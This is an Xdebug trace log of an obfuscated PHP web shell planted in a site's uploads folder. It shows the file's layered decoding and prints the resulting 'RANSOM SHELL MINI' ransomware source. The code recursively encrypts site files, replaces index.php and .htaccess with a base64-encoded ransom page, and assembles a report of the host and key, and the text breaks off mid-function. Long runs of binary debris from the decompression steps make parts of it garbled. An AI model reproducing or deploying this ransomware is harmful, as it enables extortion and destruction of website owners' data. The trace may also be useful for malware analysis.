Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 02:37:46.165155] 1 0 1 0.000133 393512 1 3 0 0.000276 414792 {main} 1 /var/www/html/uploads/ran.php 0 0 1 A /var/www/html/uploads/ran.php 8 $Cyber = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNENyaW1lJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC' 1 A /var/www/html/uploads/ran.php 9 $Crime = '==gwWSd3qUgptOw/cfb71dEDSyv/hfehpP4wM/qO0sLSzHjU88vfbegnvfBiKjvqYh2YO7gL8cMe4OfMXDbe+X/IPff6IC/8KITFHh5bVjwNuiZINz8Jy4EsBZDWuf9ph/w46jwFg2h6onyrldAjrlNAUsRmlkmJ30OHpM7AD7+zT6zSlGW+ha0HFiZApjV3ztu6FW8hzZBAlGzUY4xVpaFwV0yhqtFGwN5QVIJgwxi5RtEA0ZZHpzSYizSA0eJ5AHBdDHLdG/BxAHhL7yo7TCcUAXRcDXbcG7hP4IwsVugpRSNwdQ3w9SnxeQKwSkkQrpxPByLaYL6DRO0viwYKOHKjIt5aZBuY+rIZBwtL4p7Z/gDYjcvHNApnLzyiuO8CyvQsxzs97W6us1xdd9tI/slnprmGm8vd47500BnOQERifO87/j/Ci9PProhqcqKZJIOAYmRmmunIrx8k2vQ6T5515kMdO7vAzzwc/UT8/2YfRIfYrlkhC52leCOLedFP' 2 4 0 0.000346 414792 base64_decode 0 /var/www/html/uploads/ran.php 10 1 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNENyaW1lJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC' 2 4 1 0.000368 415080 2 4 R 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24Crime%29%29%29%29%29%29%29%29%3B' 2 5 0 0.000389 415048 urldecode 0 /var/www/html/uploads/ran.php 10 1 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24Crime%29%29%29%29%29%29%29%29%3B' 2 5 1 0.000408 415272 2 5 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));' 2 6 0 0.000427 414984 htmlspecialchars_decode 0 /var/www/html/uploads/ran.php 10 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));' 2 6 1 0.000445 415208 2 6 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));' 2 7 0 0.000475 417328 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));' /var/www/html/uploads/ran.php 10 0 3 8 0 0.000493 417328 strrev 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 '==gwWSd3qUgptOw/cfb71dEDSyv/hfehpP4wM/qO0sLSzHjU88vfbegnvfBiKjvqYh2YO7gL8cMe4OfMXDbe+X/IPff6IC/8KITFHh5bVjwNuiZINz8Jy4EsBZDWuf9ph/w46jwFg2h6onyrldAjrlNAUsRmlkmJ30OHpM7AD7+zT6zSlGW+ha0HFiZApjV3ztu6FW8hzZBAlGzUY4xVpaFwV0yhqtFGwN5QVIJgwxi5RtEA0ZZHpzSYizSA0eJ5AHBdDHLdG/BxAHhL7yo7TCcUAXRcDXbcG7hP4IwsVugpRSNwdQ3w9SnxeQKwSkkQrpxPByLaYL6DRO0viwYKOHKjIt5aZBuY+rIZBwtL4p7Z/gDYjcvHNApnLzyiuO8CyvQsxzs97W6us1xdd9tI/slnprmGm8vd47500BnOQERifO87/j/Ci9PProhqcqKZJIOAYmRmmunIrx8k2vQ6T5515kMdO7vAzzwc/UT8/2YfRIfYrlkhC52leCOLedFP' 3 8 1 0.000529 433744 3 8 R 'AdckKNsB0iQt2wHNJDLbeJwBwiQ923ic7X1pc+JGt/DnSVX+g0J8g33jsQXYHuOFhH0ZwDY7JCmXNiOBtkhivc/89/ecbklIQtiemTxP1XvrkvIA6tOnT5/9dDedu59KD8Xe+LHMyI6m5n784c5/lzgR3hmGuXMUR5VynXy7+9BiurVys8m06u363TltAGDb2agS42xM6T7hSGvnXLDtBDTwhrhh/odgYXhOmE8tY6GLN8zPqXyqmKrc0hbBUA0LHkpp/A8efvnxhzNFNxeO5PU1LFGyPpJhbhjRcBxJvA01eTgyn7JXLHsbHdJrdyxOt03OknQnPPhKVhzJfYQz+MipylS/YQSAlCyXJltSJeHriZpakqR/PUleNzLygtcUf+Sv4shFMV+5/A6O4PCWZC9Uh4weZI4qvTgU4u6cUIK6oCr6nLEk9T5BHtmyJDmJqG4wsiW93CdkxzHtm/NzjVsLon7GG4ZjA0EmfhEM7fzF0GGwlWQbmnR+cXZ1lsHe' 3 9 0 0.000563 433712 base64_decode 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 'AdckKNsB0iQt2wHNJDLbeJwBwiQ923ic7X1pc+JGt/DnSVX+g0J8g33jsQXYHuOFhH0ZwDY7JCmXNiOBtkhivc/89/ecbklIQtiemTxP1XvrkvIA6tOnT5/9dDedu59KD8Xe+LHMyI6m5n784c5/lzgR3hmGuXMUR5VynXy7+9BiurVys8m06u363TltAGDb2agS42xM6T7hSGvnXLDtBDTwhrhh/odgYXhOmE8tY6GLN8zPqXyqmKrc0hbBUA0LHkpp/A8efvnxhzNFNxeO5PU1LFGyPpJhbhjRcBxJvA01eTgyn7JXLHsbHdJrdyxOt03OknQnPPhKVhzJfYQz+MipylS/YQSAlCyXJltSJeHriZpakqR/PUleNzLygtcUf+Sv4shFMV+5/A6O4PCWZC9Uh4weZI4qvTgU4u6cUIK6oCr6nLEk9T5BHtmyJDmJqG4wsiW93CdkxzHtm/NzjVsLon7GG4ZjA0EmfhEM7fzF0GGwlWQbmnR+cXZ1lsHe' 3 9 1 0.000625 450128 3 9 R '\001$(\001$-\001$2x\001$=x}isFIUB|}\005\036ㅄ}\0316;$)6#HbnIHB؞Hk\\\0044a`axNO-c7ϩ|\026P\r\v\036Ji\017\036~3E7\0275,Q>an\030p\034I\r5y82W,{\033\035kw,NMΒt\'A\036ٲ$9n0%\'d1s[\v~\033c\003A&~\021\fad\033t~qvuޡg\002T]' 3 10 0 0.000836 433712 gzinflate 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 '\001$(\001$-\001$2x\001$=x}isFIUB|}\005\036ㅄ}\0316;$)6#HbnIHB؞Hk\\\0044a`axNO-c7ϩ|\026P\r\v\036Ji\017\036~3E7\0275,Q>an\030p\034I\r5y82W,{\033\035kw,NMΒt\'A\036ٲ$9n0%\'d1s[\v~\033c\003A&~\021\fad\033t~qvuޡg\002T]' 3 10 1 0.001053 446032 3 10 R '\001$-\001$2x\001$=x}isFIUB|}\005\036ㅄ}\0316;$)6#HbnIHB؞Hk\\\0044a`axNO-c7ϩ|\026P\r\v\036Ji\017\036~3E7\0275,Q>an\030p\034I\r5y82W,{\033\035kw,NMΒt\'A\036ٲ$9n0%\'d1s[\v~\033c\003A&~\021\fad\033t~qvuޡg\002T]CwQY2' 3 11 0 0.001263 429616 gzinflate 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 '\001$-\001$2x\001$=x}isFIUB|}\005\036ㅄ}\0316;$)6#HbnIHB؞Hk\\\0044a`axNO-c7ϩ|\026P\r\v\036Ji\017\036~3E7\0275,Q>an\030p\034I\r5y82W,{\033\035kw,NMΒt\'A\036ٲ$9n0%\'d1s[\v~\033c\003A&~\021\fad\033t~qvuޡg\002T]CwQY2' 3 11 1 0.001469 441936 3 11 R '\001$2x\001$=x}isFIUB|}\005\036ㅄ}\0316;$)6#HbnIHB؞Hk\\\0044a`axNO-c7ϩ|\026P\r\v\036Ji\017\036~3E7\0275,Q>an\030p\034I\r5y82W,{\033\035kw,NMΒt\'A\036ٲ$9n0%\'d1s[\v~\033c\003A&~\021\fad\033t~qvuޡg\002T]CwQY2}΁' 3 12 0 0.001678 429616 gzinflate 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 '\001$2x\001$=x}isFIUB|}\005\036ㅄ}\0316;$)6#HbnIHB؞Hk\\\0044a`axNO-c7ϩ|\026P\r\v\036Ji\017\036~3E7\0275,Q>an\030p\034I\r5y82W,{\033\035kw,NMΒt\'A\036ٲ$9n0%\'d1s[\v~\033c\003A&~\021\fad\033t~qvuޡg\002T]CwQY2}΁' 3 12 1 0.001884 441936 3 12 R 'x\001$=x}isFIUB|}\005\036ㅄ}\0316;$)6#HbnIHB؞Hk\\\0044a`axNO-c7ϩ|\026P\r\v\036Ji\017\036~3E7\0275,Q>an\030p\034I\r5y82W,{\033\035kw,NMΒt\'A\036ٲ$9n0%\'d1s[\v~\033c\003A&~\021\fad\033t~qvuޡg\002T]CwQY2}΁f?H' 3 13 0 0.002092 429616 gzuncompress 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 'x\001$=x}isFIUB|}\005\036ㅄ}\0316;$)6#HbnIHB؞Hk\\\0044a`axNO-c7ϩ|\026P\r\v\036Ji\017\036~3E7\0275,Q>an\030p\034I\r5y82W,{\033\035kw,NMΒt\'A\036ٲ$9n0%\'d1s[\v~\033c\003A&~\021\fad\033t~qvuޡg\002T]CwQY2}΁f?H' 3 13 1 0.002303 441936 3 13 R 'x}isFIUB|}\005\036ㅄ}\0316;$)6#HbnIHB؞Hk\\\0044a`axNO-c7ϩ|\026P\r\v\036Ji\017\036~3E7\0275,Q>an\030p\034I\r5y82W,{\033\035kw,NMΒt\'A\036ٲ$9n0%\'d1s[\v~\033c\003A&~\021\fad\033t~qvuޡg\002T]CwQY2}΁f?HeXϖd\032' 3 14 0 0.002515 429616 gzuncompress 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 'x}isFIUB|}\005\036ㅄ}\0316;$)6#HbnIHB؞Hk\\\0044a`axNO-c7ϩ|\026P\r\v\036Ji\017\036~3E7\0275,Q>an\030p\034I\r5y82W,{\033\035kw,NMΒt\'A\036ٲ$9n0%\'d1s[\v~\033c\003A&~\021\fad\033t~qvuޡg\002T]CwQY2}΁f?HeXϖd\032' 3 14 1 0.002865 462416 3 14 R '\r\n\r\n\r\n RANSOM SHELL MINI\r\n\r\n\r\n\r\n\r\n
\r\n .htaccess (Default Page)
\';\r\n }\r\n if(file_put_contents("index.php", base64_decode("CjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KICAgPGhlYWQ+CgkgIDx0aXRsZT5BbGwgWW91ciBXZWJzaXRlIERhdGFiYXNlIEZpbGVzIEFyZSBFbmNyeXB0ZWQ8L3RpdGxlPgogICAgICA8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICAgIDxtZXRhIGNvbnRlbnQ9IjVIMzExXzFOSjNDNzA2IiBuYW1lPSJkZXNjcmlwdGlvbiIvPgogICAgICA8bWV0YSBjb250ZW50PSI1SDMxMV8xTkozQzcwNiIgbmFtZT0ia2V5d29yZHMiLz4KICAgICAgPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwOi8vczI5LnBvc3RpbWcub3JnLzdydTJxNzZqYi9rY3dfbG9nb19kZWZhY2UucG5nIiAvPgoKICAgICAgPGxpbmsgaHJlZj0iaHR0cDovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9QmxhY2srT3BzK09uZXxNb250c2VycmF0fENhYmluK1NrZXRjaHxPcmJpdHJvbnxBcmNoaXRlY3RzK0RhdWdodGVyfFBlcm1hbmVudCtNYXJrZXJ8THVja2llc3QrR3V5fENoZXJyeStDcmVhbStTb2RhIiByZWw9InN0eWxlc2hlZXQiIC8+CiAgICAgIDxsaW5rIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2FuaW1hdGUuY3NzLzMuNS4yL2FuaW1hdGUubWluLmNzcyIgcmVsPSJzdHlsZXNoZWV0IiAvPgogICAgICA8bGluayBocmVmPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9mb250LWF3ZXNvbWUvNC43LjAvY3NzL2ZvbnQtYXdlc29tZS5taW4uY3NzIiByZWw9InN0eWxlc2hlZXQiIC8+CiAgICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHA6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LWxhdGVzdC5taW4uanMiPjwvc2NyaXB0PgogICAgICAKCiAgICAgIDwhLS0gQ1NTIFNUQVJUIEhFUkUgLS0+CiAgICAgIDxzdHlsZT4KCQkgaHRtbCwgYm9keSB7bWluLWhlaWdodDogMTAwJTt9CiAgICAgICAgIGJvZHkgewoJCSB3aWR0aDogMTAwJTsKCQkgaGVpZ2h0OiAxMDAlOwogICAgICAgICBtYXJnaW46IDA7CiAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgIGJhY2tncm91bmQtaW1hZ2U6IHVybCgnaHR0cHM6Ly9pbWFnZXM0LmFscGhhY29kZXJzLmNvbS82MzQvdGh1bWItMTkyMC02MzQ0NC5qcGcnKTsKICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogIzAwMDsKICAgICAgICAgYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsKICAgICAgICAgYmFja2dyb3VuZC1wb3NpdGlvbjogY2VudGVyOwogICAgICAgICBiYWNrZ3JvdW5kLXNpemU6IDE1MCU7CiAgICAgICAgIGJhY2tncm91bmQtY29sb3I6ICMwMDA7CiAgICAgICAgIGNvbG9yOiAjRkZGRkZGOwogICAgICAgICBmb250LWZhbWlseToiT3JiaXRyb24iOwogICAgICAgICBmb250LXNpemU6IDE0cHQ7CiAgICAgICAgIHRleHQtYWxpZ246IGNlbnRlcjsKICAgICAgICAgdGV4dC1kZWNvcmF0aW9uOiBub25lOwogICAgICAgICB9IAogICAgICAgICBhIHsgdGV4dC1kZWNvcmF0aW9uOiBub25lOyB9CiAgICAgICAgIC52aXMgewoJCSAgdGV4dC1zaGFkb3c6IDJweCAycHggMnB4ICMwMDA7CgkJIH0KICAgICAgICAgLmdsb3cgewogICAgICAgICB0ZXh0LXNoYWRvdzogMCAwIDEwcHggI0Y1OTcwMDsKICAgICAgICAgZm9udC1mYW1pbHk6IkJsYWNrIE9wcyBPbmUiOwogICAgICAgICB9CiAgICAgICAgIC5ibHVlZ2xvdyB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgMTBweCAjMEY2RkJEOwogICAgICAgICBmb250LWZhbWlseToiQmxhY2sgT3BzIE9uZSIKICAgICAgICAgfQogICAgICAgICAud2hpdGVnbG93LC5ndyB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgNXB4ICNGRkZGRkY7CiAgICAgICAgIGZvbnQtZmFtaWx5OiJCbGFjayBPcHMgT25lIjsKICAgICAgICAgfQoKICAgICAgICAgI2hlbGxvIHsKICAgICAgICAgZm9udC1zaXplOiAyMHB4OwogICAgICAgICAtbW96LXRyYW5zaXRpb246IGNvbG9yIDFzOwogICAgICAgICAtd2Via2l0LXRyYW5zaXRpb246IGNvbG9yIDFzOwogICAgICAgICAtbXMtdHJhbnNpdGlvbjogY29sb3IgMXM7CiAgICAgICAgIC1vLXRyYW5zaXRpb246IGNvbG9yIDFzOwogICAgICAgICB0cmFuc2l0aW9uOiBjb2xvciAxLjJzOwogICAgICAgICBmb250LWZhbWlseToiQmxhY2sgT3BzIE9uZSIKICAgICAgICAgfQogICAgICAgICAjaGVsbG86aG92ZXIgewogICAgICAgICBjb2xvcjogeWVsbG93OwogICAgICAgICAtd2Via2l0LXN0cm9rZS13aWR0aDogMTBweDsKICAgICAgICAgLXdlYmtpdC1zdHJva2UtY29sb3I6ICNGRkZGRkY7CiAgICAgICAgIC13ZWJraXQtZmlsbC1jb2xvcjogI0ZGRkZGRjsKICAgICAgICAgdGV4dC1zaGFkb3c6IDFweCAwcHggMjBweCByZWQ7CiAgICAgICAgIGZvbnQtZmFtaWx5OiJCbGFjayBPcHMgT25lIgogICAgICAgICB9CiAgICAgICAgIC5jbjEsLmdnIHsKICAgICAgICAgdGV4dC1zaGFkb3c6IDAgMCAxM3B4ICM1N2Y5Mjc7CiAgICAgICAgIGZvbnQtZmFtaWx5OiJCbGFjayBPcHMgT25lIjsKICAgICAgICAgfQogICAgICAgICAuY25hLC5nbyB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgMTNweCAjZjk5OTFkOwogICAgICAgICBmb250LWZhbWlseToiQmxhY2sgT3BzIE9uZSI7CiAgICAgICAgIH0KICAgICAgICAgLmdyIHsKICAgICAgICAgdGV4dC1zaGFkb3c6IDAgMCAxM3B4IHJlZDsKICAgICAgICAgZm9udC1mYW1pbHk6IkJsYWNrIE9wcyBPbmUiOwogICAgICAgICB9CiAgICAgICAgIC5rY3dpbWcgeyAKICAgICAgICAgd2lkdGg6IDE2MHB4OwogICAgICAgICBoZWlnaHQ6IDE0MHB4OyAKICAgICAgICAgfSAKICAgICAgICAgLmNhcHMgewogICAgICAgICB0ZXh0LXRyYW5zZm9ybTogdXBwZXJjYXNlOwogICAgICAgICBmb250LWZhbWlseTogIkNhYmluIFNrZXRjaCI7CiAgICAgICAgIH0KCiAgICAgICAgICNuZW9uZm9udAogICAgICAgICB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgNXB4IHJlZDsKICAgICAgICAgLXdlYmtpdC10cmFuc2l0aW9uOiB0ZXh0LXNoYWRvdyAycyBlYXNlLW91dDsKICAgICAgICAgLW1vei10cmFuc2l0aW9uOiB0ZXh0LXNoYWRvdyAycyBlYXNlLW91dDsKICAgICAgICAgLW8tdHJhbnNpdGlvbjogdGV4dC1zaGFkb3cgMnMgZWFzZS1vdXQ7CiAgICAgICAgIHRyYW5zaXRpb246IHRleHQtc2hhZG93IDJzIGVhc2Utb3V0OwogICAgICAgICBmb250LXNpemU6MzVweDsKICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGRlcjsKICAgICAgICAgfQogICAgICAgICAjbmVvbmZvbnQ6aG92ZXJ7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgMzBweCByZWQ7CiAgICAgICAgIH0KICAgICAgICAgLm1lZ2EgewogICAgICAgICB0ZXh0LXNoYWRvdzogNHB4IDAgOHB4ICMwMDczQjk7CiAgICAgICAgIGZvbnQtd2VpZ2h0OiBib2xkZXI7CiAgICAgICAgIGZvbnQtZmFtaWx5OiAiQXJjaGl0ZWN0cyBEYXVnaHRlciI7CiAgICAgICAgIH0KICAgICAgICAgLndlYXJlIHsKICAgICAgICAgZm9udC1mYW1pbHk6ICJQZXJtYW5lbnQgTWFya2VyIjsKICAgICAgICAgdGV4dC1zaGFkb3c6IDAgMCAzcHggcmVkOwogICAgICAgICBmb250LXNpemU6IDEuM2VtOwogICAgICAgICB9CiAgICAgICAgIC50aHVtYiB7CiAgICAgICAgIHdpZHRoOiAxNTBweDsgCiAgICAgICAgIGhlaWdodDogMTkwcHg7IAogICAgICAgICBtYXJnaW46IDcwcHggYXV0bzsKICAgICAgICAgcGVyc3BlY3RpdmU6IDEwMDBweDsKICAgICAgICAgfQogICAgICAgICAudGh1bWIgc3BhbiB7CiAgICAgICAgIGRpc3BsYXk6IGJsb2NrOyB3aWR0aDogMTAwJTsgaGVpZ2h0OiAxMDAlOwogICAgICAgICBiYWNrZ3JvdW5kOiAKICAgICAgICAgbGluZWFyLWdyYWRpZW50KHJnYmEoMCwgMCwgMCwgMC40KSwgcmdiYSgwLCAwLCAwLCAwLjQpKSwgdXJsKCJodHRwOi8vczI5LnBvc3RpbWcub3JnLzdydTJxNzZqYi9rY3dfbG9nb19kZWZhY2UucG5nIik7CiAgICAgICAgIGJhY2tncm91bmQtc2l6ZTogMCwgY292ZXI7CiAgICAgICAgIHRyYW5zZm9ybS1zdHlsZTogcHJlc2VydmUtM2Q7CiAgICAgICAgIHRyYW5zaXRpb246IGFsbCAwLjVzOwogICAgICAgICB9CiAgICAgICAgIGhyIHsKCQkJIGJveC1zaGFkb3c6IDNweCAzcHggM3B4IDNweCAjODg4ODg4OwoJCQkgY29sb3I6I2ZmZjsKCQkJIG1hcmdpbi1ib3R0b206IDJweDsKCQkgfQoJCSAuZ3JlZWV0IHsKCQkJIGZvbnQtZmFtaWx5OkFsZHJpY2g7Zm9udC13ZWlnaHQ6Ym9sZDtmb250LXNpemU6MTdweDsKCQkgfSAKCQkgLmVuaGFuY2UgewoJCQkgcGFkZGluZzogMWVtIDFlbTsKCQkJIGJhY2tncm91bmQ6dXJsKCcnKTsKCQkgfQoJCSAubm9wIHsKCQkJIGJhY2tncm91bmQ6IHJnYmEoMzIsIDMyLCAzMiwgLjQpOwogICAgICAgICAgICAgICAgICAgICAgICAgcGFkZGluZzogOHB4IDhweDsKCQkgfSAKCQkgLmlwa2V5IHsKCQkJIHdpZHRoOiAyMCU7CiAgICAgICAgICAgICB0cmFuc2l0aW9uOiB3aWR0aCAxczsKICAgICAgICAgICAgIC13ZWJraXQtdHJhbnNpdGlvbjogd2lkdGggMXM7CiAgICAgICAgICAgICAtbW96LXRyYW5zaXRpb246IHdpZHRoIDFzOwogICAgICAgICAgICAgaGVpZ2h0OiA0MHB4OwogICAgICAgICAgICAgZm9udC1mYW1pbHk6TW9udHNlcnJhdDtmb250LXdlaWdodDpib2xkO2ZvbnQtc2l6ZToyNXB4OwoJCSB9CgkJIC5pcGtleTpob3ZlciB7CgkJCSB3aWR0aDogMzAlOwoJCSB9CgkJIC5pcHR4dCB7CgkJCSB3aWR0aDogNTAlOwoJCQkgaGVpZ2h0OiA0MHB4OwoJCQkgZm9udC1mYW1pbHk6TW9udHNlcnJhdDtmb250LXdlaWdodDpib2xkO2ZvbnQtc2l6ZToxNXB4OwoJCSB9CgkJIC5idXR0b24gewoJCQkgYmFja2dyb3VuZDogIzY2NjsKCQkJIGJvcmRlcjogMXB4IHNvbGlkICNmZmY7CgkJCSBoZWlnaHQ6IDQwcHg7CgkJCSBmb250LXNpemU6IDIwcHg7CgkJCSBib3JkZXItcmFkaXVzOiA1cHggNXB4IDVweCA1cHg7CgkJCSB0ZXh0LXRyYW5zZm9ybTogdXBwZXJjYXNlOwoJCQkgY29sb3I6ICNmZmY7CgkJIH0KCQkgLmJ1dHRvbjpob3ZlciB7CgkJCSBiYWNrZ3JvdW5kOiAjMDAwOwoJCSB9CiAgICAgIDwvc3R5bGU+CiAgIDwvaGVhZD4KICAgCiAgIDxib2R5PgogICAgICA8ZW1iZWQgc3JjPSJodHRwczovL2RsLmRyb3Bib3h1c2VyY29udGVudC5jb20vcy9tbnc5MXFhb2I1MG96dmwvd2UlMjBhcmUlMjBhbm9ueW1vdXMubXAzP2RsPTAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIC8+CiAgICAgIDxjZW50ZXI+CgkJICAKICAgICAgICAgPCEtLSB3aG8gd2UgYXJlPyAtLT4KICAgICAgICAgPGRpdiBpZD0iaGVhZGVyIj4KCQkgICA8c3BhbiBjbGFzcz0iZ2xvdyIgc3R5bGU9ImZvbnQtc2l6ZTogMzBwdDsiPuKAqjxpIGNsYXNzPSJmYSBmYS1oYW5kLW8tcmlnaHQiIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+IEJMQUNLIFBIQU5UT00gQ1lCRVIgPGkgY2xhc3M9ImZhIGZhLWhhbmQtby1sZWZ0IiBhcmlhLWhpZGRlbj0idHJ1ZSI+PC9pPjwvc3Bhbj48YnIvPgoJCSAgIAkJICAKICAgICAgICAgICA8ZGl2IGNsYXNzPSJhbmltYXRlZCBmbGlwIj48c3BhbiBjbGFzcz0iYmx1ZWdsb3cgY2FwcyI+PGZvbnQgc2l6ZT0iNSI+PGkgY2xhc3M9ImZhIGZhLXJhdmVscnkiIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+IFlPVVIgU0lURSBJUyBJTkZFQ1RFRCBCWSBSQU5TT01XQVJFIDxpIGNsYXNzPSJmYSBmYS1yYXZlbHJ5IiBhcmlhLWhpZGRlbj0idHJ1ZSI+PC9pPjwvZm9udD48L3NwYW4+PC9kaXY+CiAgICAgICAgIDwvZGl2PgogICAgICAgICA8IS0tIEJQQyBMb2dvIC0tPiAKICAgICAgICAgPGRpdiBjbGFzcz0idGh1bWIga2N3aW1nIj4KICAgICAgICAgICAgPHNwYW4+PC9zcGFuPgogICAgICAgICA8L2Rpdj4KICAgICAgCiAgICAgICAgIDwhLS1lbmNyeXB0IG1zZyAtLT4KICAgICAgICAgPGRpdiBjbGFzcz0iYW5pbWF0ZWQgaW5maW5pdGUgZmxhc2giPjxzcGFuIGNsYXNzPSJnciIgc3R5bGU9J2NvbG9yOmJsYWNrOyBmb250LWZhbWlseTogIkx1Y2tpZXN0IEd1eSInPjxmb250IHNpemU9IjUiPjxpIGNsYXNzPSJmYSBmYS1sb2NrIiBhcmlhLWhpZGRlbj0idHJ1ZSI+PC9pPiBZT1VSIEZJTEVTIEhBVkUgQkVFTiBFTkNSWVBURUQgPGkgY2xhc3M9ImZhIGZhLWxvY2siIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+PC9mb250Pjwvc3Bhbj48L2Rpdj4KICAgICAgICAgPGJyPgogICAgICAgICA8IS0tIGtleSAtLT4KICAgICAgICAgPGRpdiBjbGFzcz0ibm9wIj4KICAgICAgICAgPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+CiAgICAgICAgIDxwPjxpIGNsYXNzPSJmYSBmYS1oYW5kLW8tZG93biIgYXJpYS1oaWRkZW49InRydWUiPjwvaT4gRU5URVIgVEhFIEtFWSBUTyBERUNSWVBUIEZJTEVTIDxpIGNsYXNzPSJmYSBmYS11bmxvY2siIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+PC9wPgogICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgY2xhc3M9Imlwa2V5IiBuYW1lPSJpb2tleSIgLz4KICAgICAgICAgPC9mb3JtPgogICAgICAgICA8L2Rpdj4gICAgICAgICA8IS0tIEk0TSAtLT4KICAgICAgICAgPGgxIHN0eWxlPSdmb250LWZhbWlseTogIkNoZXJyeSBDcmVhbSBTb2RhIjsnPjxiPuKclzxzcGFuIGNsYXNzPSJtZWdhIj41SDMxMV8xTkozQzcwNjwvc3Bhbj7inJc8L2I+PC9oMT4KICAgICAgICAgPGJyPgogICAgICAgICA8YnI+CiAgICAgICAgIAoKICAgICAgICAgPCEtLSB3YXJuaW5nIC0tPgogICAgICAgICAgIDxkaXYgY2xhc3M9IndlYXJlIj5XZSBhcmUgTGVnaW9uLi4uIFdlIGRvIG5vdCBGb3JnaXZlLi4uIFdlIGRvIG5vdCBGb3JnZXQuLi4gPGI+PGk+RXhwZWN0IHVzPC9pPjwvYj48L2Rpdj4KICAgICAgICAgICA8YnI+CiAgIDwvYm9keT4KPC9odG1sPg=="))){\r\n echo \' index.php (Default Page)
\';\r\n }\r\n }\r\n }\r\n public function shcpackUnstall(){\r\n\r\n if( file_exists(".htaFuck") ){\r\n if( unlink(".htaccess") && unlink("index.php") ){\r\n echo \' .htaccess (Default Page)
\';\r\n echo \' index.php (Default Page)
\';\r\n }\r\n rename(".htaFuck", ".htaccess");\r\n }\r\n\r\n }\r\n\r\n public function plus(){\r\n flush();\r\n ob_flush();\r\n }\r\n public function locate(){\r\n return getcwd();\r\n }\r\n public function shcdirs($dir,$method,$key){\r\n switch ($method) {\r\n case \'1\':\r\n deRanSomeware::shcpackInstall();\r\n break;\r\n case \'2\':\r\n deRanSomeware::shcpackUnstall();\r\n break;\r\n }\r\n foreach(scandir($dir) as $d)\r\n {\r\n if($d!=\'.\' && $d!=\'..\')\r\n {\r\n $locate = $dir.DIRECTORY_SEPARATOR.$d;\r\n if(!is_dir($locate)){\r\n if( deRanSomeware::kecuali($locate,"ransmini.php") && deRanSomeware::kecuali($locate,".pnjg") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,"indehx.php") && deRanSomeware::kecuali($locate,".htalol") ){\r\n switch ($method) {\r\n case \'1\':\r\n deRanSomeware::shcEnCry($key,$locate);\r\n deRanSomeware::shcEnDesDirS($locate,"1");\r\n break;\r\n case \'2\':\r\n deRanSomeware::shcDeCry($key,$locate);\r\n deRanSomeware::shcEnDesDirS($locate,"2");\r\n break;\r\n }\r\n }\r\n }else{\r\n deRanSomeware::shcdirs($locate,$method,$key);\r\n }\r\n }\r\n deRanSomeware::plus();\r\n }\r\n deRanSomeware::report($key);\r\n }\r\n\r\n public function report($key){\r\n $message.= "========= Tuyuljahat =========\\n";\r\n $message.= "Website : ".$_SERVER[\'HTTP_HOST\'];\r\n $message.= "Key : ".$key;\r\n $message.= "========= Ransomware =========\\n";\r\n $subject = 